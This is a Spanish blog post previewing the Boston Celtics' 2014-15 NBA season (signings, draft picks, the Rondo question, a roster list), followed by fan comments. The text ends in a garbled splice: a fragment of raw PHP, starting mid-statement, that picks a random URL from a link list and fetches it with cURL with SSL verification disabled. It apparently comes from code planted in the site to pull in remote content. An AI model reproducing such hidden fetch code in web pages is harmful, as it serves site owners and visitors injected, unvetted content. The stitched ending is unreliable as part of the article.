Boston Celtics 2014-2015: Gato por liebre

03 de October de 2014 por TheDeerHunter

Soñar con Kevin Love y despertar con Erik Murphy. Los aficionados célticos deben sentirse como ese tipo que, completamente ebrio, cree haberse ligado a la reina de la fiesta al final de la noche pero amanece junto a la última “orca” que le tocó en suerte. Acertamos y Danny Ainge no se atrevió a intentar ni movimientos sonados ni cambios traumáticos en la reconstrucción que maneja. Política conservadora, utilizando lo mejor que fueron capaces sus elecciones de draft, renovando algún expiring y fichando agentes libres no demasiado cotizados. Lo peor es que, respecto a algunas esperadas salidas, no se ha cerrado ninguno de los frentes que tenían abiertos y ello generará tensiones y provocará cambios durante el curso. No preocupa este aspecto en términos resultadistas pues se trata de poner un ladrillo más en una reconstrucción que se estima larga.

Movimientos clave

Nos sorprendieron con su pick más alto al elegir a Marcus Smart en lugar de un interior, con las dudas añadidas de cómo compatibilizará con Rondo. En cambio, el ex de Kentucky James Young sí era uno de los nombres que barajábamos para la siguiente elección. Con estas dos incorporaciones sumadas a las de Evan Turner y Marcus Thornton (a falta de conocer qué papel les dará Brad Stevens a ambos), el perímetro es, sin duda, lo que más se ha reforzado. Ha llegado también Tyler Zeller, un jugador que consideramos más aprovechable de lo que le dejaron demostrar en Cleveland, pero del que no sabemos si es el más idóneo para reforzar un juego interior con bastante clase pero no demasiado rocoso. Tampoco solucionarán este aspecto Erik Murphy ni el novato de segunda ronda Dwight Powell, llegados a cambio de Keith Bogans tras un trade con los Cavaliers, suponiendo que les dejen disfrutar de algún minuto.

Qué esperamos de ellos

La plantilla no parece significativamente superior a la del pasado año. Sin preocuparse mucho por los resultados, el objetivo será seguir dando rodaje a los jóvenes y acumular rondas. Acerca de la operación salida de algunos hombres que no casan con ese planteamiento ya no sabemos qué esperar. Seguramente Brandon Bass no acabará la temporada y ya venimos avisando desde hace un tiempo que con Rajon Rondo tienen un problema que cada día que pasa es más grave. Por un lado escenifica una implicación total con el proyecto y por el otro se lesiona por dos meses en extrañas circunstancias.

Pronóstico

Alguna victoria más que el año pasado pero igualmente penúltimos de la Atlántico.

Plantilla

PG: Rajon Rondo, Marcus Smart(R), Phil Pressey
SG: Avery Bradley, Evan Turner, Marcus Thornton, James Young(R)
SF: Jeff Green, Gerald Wallace
PF: Jared Sullinger, Kelly Ollynyck, Brandon Bass, Erik Murphy, Dwight Powell(R)
C: Tyler Zeller, Vitor Faverani, Joel Anthony

Bajas: Jerryd Bayless (MIL), Kris Humphries (WAS), Keith Bogans(CLE), Chris Johnson(PHI), Chris Babb

Si quieres leer más previas de la temporada 2014/2015 las encontrarás aquí (según vayan siendo publicadas).

Comenta

14 comentarios a esta entrada

  1. Jose A. Ramírez dice:
    #1

    El equipo de mis amores… aiii estos celtics… Bueno, para comenzar creo que en las elecciones de draft se van a marcar un tanto, Smart tiene pinta de ser un robo y Ainge se la jugado al apostar por los dos chavales en el backcourt cuando las carencias de este equipo son los jugadores interiores. Temporada de transicion, una mas y tampoco es que se pueda decir que se sigue una linea clara, hay demasiados bandazos en la gestion deportiva y yo personalmente sospecho que Ainge no hace nada gordo porque tiene miedo a no ser capaz de gestionar la situacion correctamente, aunque algo me dice que tiene atado a alguien importante para la agencia libre de la temporada proxima. Centrandonos en los jugadores, con Rondo entran ganas de echarse las manos a la cabeza con la mala suerte que tiene, aunque volvera siendo mejor aun de lo que era y demostrando que sano es el base puro mejor de la nba, el aura de especial que lo rodea y la competitividad no tienen parangon, Smart tengo muchas esperanzas puestas, parece un combo-guard muy completo, de Green hay que esperar que de veras ya sea un lider y de ese paso para convertirse en All-Star, esta ante su ultima oportunidad para demostrar que es jugador top, yo personalmente a Bass lo veo un jugador que se le puede sacar mucho partido y que lo lleva demostrando tiempo ya que esta aclimatado a la cultura celtic.. Y poco mas, evan turner no me parece nada del otro mundo aparte que para amansar balon y teniendo a los que hay no entiendo esa firma, jugador MUY sobrevalorado… Espero que Bradley explote en ataque y se consolide porque tiene las cualidades y el orgullo verde para formar parte de un equipo ganador si cuaja el proyecto… Wallace es un cancer para el vestuario, espero que se largue ya y respecto al juego interior.. salvo Bass Sally y Zeller, no quiero ver ni en pintura a los faveranis olyniks y demas basura… Despues podran decir yo jugue en los celtics… Habra que ver como lo hace Ainge pero si de aqui a un año no hay estrella o equipo para aspirar a algo su cabeza va a estar en juego, porque parece que ahora mismo y de hace tiempo este en tierra de nadie jugando a ser GM. Rondaremos las 30 victorias y a que terminen los contratos que expiran y a seguir drafteando o bien hacer una operacion.gorda, pero que por favor NO traspasen a Rondo, ya veremos que sucede

      Citar

  2. Azabel dice:
    #2

    que bquieres que te diga, no me parece un mal equipo y con algo de suerte pueden pelear por PO

    el trio perimetral rondo, bradley y green esta casi a la altura de cualquiera en elo flojito ESTE, y un banco con Smart, Thorton y Turner al menos deberia responder sin ser una locura, algo deberian aportar

    el juego interior es algo flojo, pero tanto sullinger, ollynyck y bass son buenos en esa posicion

    obviamente que les falta algun jugador diferencial y que el puesto de pivot esta algo cojo, pero no los veo muy atras de varios equipos que supuestamente van a entrar a PO

      Citar

  3. auskalo dice:
    #3

    Con Rondo es significativamente superior al año pasado. Les falta intimidacion por dentro y un anotador consistente, pero pueden pegarse para meterse en PO.

    Bueno, a groso modo, estoy de acuerdo con Azabel

      Citar

  4. franitis dice:
    #4

    Hombre, a mí igual que el pasado año que nos comimos un colín, el verde se me sube a la cabeza a principios de temporada.

    Me ilusiona Smart; me ilusiona tener a Turner de sexto hombre; la evolución de Sulli y Olynyk, así como la recuperación de Faverani; me encantaría volver a ver a Rondo comandando; quisiera ver a Green por fin dando ese paso adelante; a Bradley una temporada completa sin caer lesionado y manteniendo su progresión ofensiva…

    Y por supuesto la temporada Sophomore de Brad Stevens, con algo más de requisitos que la temporada de debut, en la que le dejaron hacer lo que le diese la gana siempre y cuando se dejara tanquear (muchos partidos perdidos en el último cuarto el año pasado…).

    Yo sí creo en PO. Me baso en los Suns del año pasado, que aunque se quedaron fuera, dieron guerra hasta el final sin llamar la atención a priori.

    Sé que son muchos “What if”, pero…

    Por último el caso Rondo… Me huele a que al final se marcha, y nos dolería a todos los célticos porque este hombre es el mejor base de la liga con permiso de Tony Parker… Pero la ilusión es que Smart llegue a mejorarlo y en la agencia libre de este verano saquemos algo productivo gracias al espacio salarial que generemos (aunque LA agencia libre es en 2.016, con KD…). Ojalá no se nos vaya y se convierta en la estrella de un equipo coral y equilibrado al que él haga crecer.

      Citar

  5. Jose A. Ramírez dice:
    #5

    Yo no se como explicarlo, da igual si es mejor alguien o no que rondo en terminos estadisticos, la cuestion es que ese aire especial que lo rodea no lo tiene ningun jugador en el mundo. Siendo mas claro, preferiria haber mantenido el big four y caer en primea ronda año tras año que tener otros jugadors y caer en semifinales de conferencia por ejemplo. Para los que hemos estado viendo y siguiendo todo esta era, te identificas y te sientes orgulloso de esa camiseta, tanto, que ahora te sabe a muy poco lo demas, por eso hay que cuidar la tradicion y todo lo que eso conlleva, por algo es la aficion mas entendida de basket del mundo, solo hay que darse una vuelta por la ciudad en los prolegomenos de un partido. Estoy de acuerdo con franitis, el verde es mucho verde y se nos sube a la cabeza, pero es algo temporal, mientras que el identificarse con ciertos.jugadores y demas es inmortal, permanece por siempre y eso no tiene precio, ya que dejan huella. Creo que a veces carecemos de ingenuos porque esto al fin y al cabo es un negocio, pero tambien igual de cierto es que para haber llegado hasta ahi por algo sera, y no ocurre en demas franquicias…. Y si, Brad Stevens es un fenomeno, nadie mejor llevarnos otra vez a la tierra prometida

      Citar

  6. franitis dice:
    #6

    Ojalá que sea paciente como lo fue Paul Pierce antes del bombazo de 2.007/2.008, cuando se generó el “Big Three” (que acabó convirtiéndose en “Big Four”…) y espere a que le confeccionen un gran equipo. Este próximo verano hay muy buenos interiores (Lamarcus Alridge, Marc Gasol…) y el próximo verano… Durant, Noah, Horford; incluso hay gente que puede optar por la agencia libre, como Lebron, Kevin Love… Hay mucha tela que cortar, y los Celtics con la salida de Wallace van a tener mucho espacio salarial para abordar grandes movimientos. Veremos qué pasa. Pero disfrutemos de la siguiente temporada mientras, viendo cómo crecen los jóvenes Celtics.

      Citar

  7. portu dice:
    #7

    No sé qué ha hecho Rondo para merecer tanto piropo… Yo recuerdo un base joven que se mataba en defensa junto al Big Three y que en ataque se quitaba de en medio o simplemente jugaba sencillo que a mi me encantaba, pero en los últimos años, aparte de las lesiones, sólo he visto un Rondo que acapara la bola como si fuera una estrella imparable, q siempre busca el pase imposible, q en defensa sólo se esfuerza si puede robar pero no tapa a su tío y que sigue sin haber mejorado prácticamente nada su tiro exterior. Yo de estrellas así paso, prefiero un equipo con los pies en el suelo y sacar por él algo decente cuando todavía tiene un mínimo valor de mercado… En cualquier caso, la clave de estos celtics reconstructores es q por muy bien que se hagan las cosas se necesitan picks más altos para robar estrellas futuras, algo a lo q difícilmente puede llegar Sulli (siendo un robo y un gran jugador) o que ni siquiera sueña con acercarse Olynyk. Gente como J. Green son demasiado dispersos para liderar y ni siquiera tiene una posición definida y gente como Bradley no dan el nivel en ataque. Veremos Smart, pero a mi como céltico me apetece no matarme este año y pescar algo con Rondo, Green y Bass para conseguir una base futura con Smart-Sulli y un pivot de buen nivel…

      Citar

  8. Azabel dice:
    #8

    que dilema el de los Celtics, solo he visto dos partidos a Smart, pero desde hoy ya digo que me gusta mas que rondo y este ultimo debe salir, pero el problema es similar al que tuvo el Jazz con jefferson y Millsap, nadie podia conajeralos y darle algo al Jazz que le interesara y terminaron yendose gratis

    que equipo en la liga esta necesitando un base de cierta edad como rondo y puedan entregar un joven de nivel similar que le pueda interesar a boston? no encuentro muchos

      Citar

  9. portu dice:
    #9

    Cierto Azabel, a Boston le puede pasar como a Utah con Al Jefferson… Y destino para Rondo, lo ideal parece Houston, pero de momento no veo que tengan piezas jóvenes suficientemente interesantes como para q el negocio interese a los celtics… Tal vez Rondo+Bass+J. Anthony (pq veo imposible meter a G. Wallace y cuadrar salarios) por T. Jones, Motiejunas, algún pick de este año o algún otro joven más como I. Canaan y todas las rondas q se puedan, pero globalmente parece un premio muy escaso…

      Citar

  10. txusma dice:
    #10

    portu:
    Cierto Azabel, a Boston le puede pasar como a Utah con Al Jefferson… Y destino para Rondo, lo ideal parece Houston, pero de momento no veo que tengan piezas jóvenes suficientemente interesantes como para q el negocio interese a los celtics… Tal vez Rondo+Bass+J. Anthony (pq veo imposible meter a G. Wallace y cuadrar salarios) por T. Jones, Motiejunas, algún pick de este año o algún otro joven más como I. Canaan y todas las rondas q se puedan, pero globalmente parece un premio muy escaso…

    Es decir, por un lado no sabes que ha hecho Rondo para merecer tanto piropo pero por el otro quieres sacar una buena tajada. Yo lo dejaba ir gratis o casi gratis sin exprimir mucho al otro equipo. Con ello ya te ahorrarás su salario y clarificarás el futuro de la franquicia.

    Larga vida a Marcus Smart!

      Citar

  11. Azabel dice:
    #11

    txusma: do no sabes que ha hecho Rondo para merecer tanto piropo pero por el otro quieres sacar una buena tajada

    ese es el tema, los Celtics no lo dejaran ir gratis y no lo cambiaran por basura, lo que nos lleva a que se quede en el equipo, lo que no tiene ningun sentido, estando en plena reconstruccion los celtics, pagarle tanto a un base de edad que no le dara muchas mas victorias que el joven rookie en esa posición

      Citar

  12. franitis dice:
    #12

    Joder, es que a mí Rondo me puede… Qué queréis que os diga… A ver si madura de una p**a vez (espero que la competencia con Smart le haga espabilar, así como estar en último año de contrato) y demuestra lo que es y puede ser; el mejor base de la liga sobre el papel. Con esa visión, esa defensa, ese carácter ganador (este tío ha ganado partidos solo), puede ser un dios. Sí coincido en que cuando entra en modo “Triple doble” está más obcecado en hacer números que en que su equipo gane. En algún partido antes de su lesión de rodilla me quejé de eso… recuerdo que llevaba nosecuantos triples dobles seguidos y él a lo suyo, mientras se perdían partidos de forma estúpida… Quiero ver a Rondo este año, a ver si nos calla la boca a todos o nos decepciona.

      Citar

  13. Azabel dice:
    #13

    franitis:
    Joder, es que a mí Rondo me puede… Qué queréis que os diga… A ver si madura de una p**a vez (espero que la competencia con Smart le haga espabilar, así como estar en último año de contrato) y demuestra lo que es y puede ser; el mejor base de la liga sobre el papel. Con esa visión, esa defensa, ese carácter ganador (este tío ha ganado partidos solo), puede ser un dios. Sí coincido en que cuando entra en modo “Triple doble” está más obcecado en hacer números que en que su equipo gane. En algún partido antes de su lesión de rodilla me quejé de eso… recuerdo que llevaba nosecuantos triples dobles seguidos y él a lo suyo, mientras se perdían partidos de forma estúpida… Quiero ver a Rondo este año, a ver si nos calla la boca a todos o nos decepciona.

    nadie duda de que es un gran jugador, solo que no lo veo encajando en estos Celtics cuando tienen a Smart en esa posición, lo que nos lleva a la duda, a quien se lo traspasan y a cambio de que? los equipos con chances de rondas altas o jóvenes están en reconstruccion y no creo que les sirva Rondo a esas edad y con esas pretensiones salariales, los equipos que tienen estrellas no van a entregar una por Rondo, y los que esten interesados solo podrían entregar algún expiring
    todo un dilema desde mi punto de vista

      Citar

  14. portu dice:
    #14

    txusma: Es decir, por un lado no sabes que ha hecho Rondo para merecer tanto piropo pero por el otro quieres sacar una buena tajada. Yo lo dejaba ir gratis o casi gratis sin exprimir mucho al otro equipo. Con ello ya te ahorrarás su salario y clarificarás el futuro de la franquicia.

    Larga vida a Marcus Smart!

    Mi opinión es la primera parte de la frase, pero en la NBA creo q la opinión generalizada entre GMs y prensa es algo cercano a la 2ª parte de la frase… Hay que aprovechar eso.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>